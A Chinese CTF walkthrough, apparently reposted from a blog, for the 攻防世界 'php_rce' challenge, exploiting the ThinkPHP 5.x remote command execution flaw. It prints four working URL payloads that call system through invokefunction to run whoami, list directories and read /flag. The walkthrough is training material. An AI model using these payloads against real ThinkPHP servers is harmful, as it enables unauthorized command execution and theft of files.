0


攻防世界-web篇(php_rce)详解

每日一题,今天我们来攻防世界web篇(php_rce)

首先打开题目:

这里我们可以看到打开后是一个ThinkPHP V5的界面,由此我们可以判断这是一个使用TinkPHP框架开发的,接下来我们由长期的渗透经验可以想多去网上找相关的漏洞来复现

这里时使用了ThinkPHP 5.x 远程命令执行漏洞

1、利用system函数远程命令执行

构造payload

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

2、查找文件目录

构造payload

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

可以看到有很多目录我要找flag接下就这就进flag去

3、进入flag目录

构造payload

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag

有两个flag文件这里我们直接使用 cat 命令来打开文件

4、查看flag文件拿到flag

构造payload

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat  
 /flag

flag{thinkphp5_rce}

标签: 安全 web安全

本文转载自: https://blog.csdn.net/qq_54803507/article/details/127041653
版权归原作者 渗透小剑客 所有, 如有侵权,请联系我们删除。

“攻防世界-web篇(php_rce)详解”的评论:

还没有评论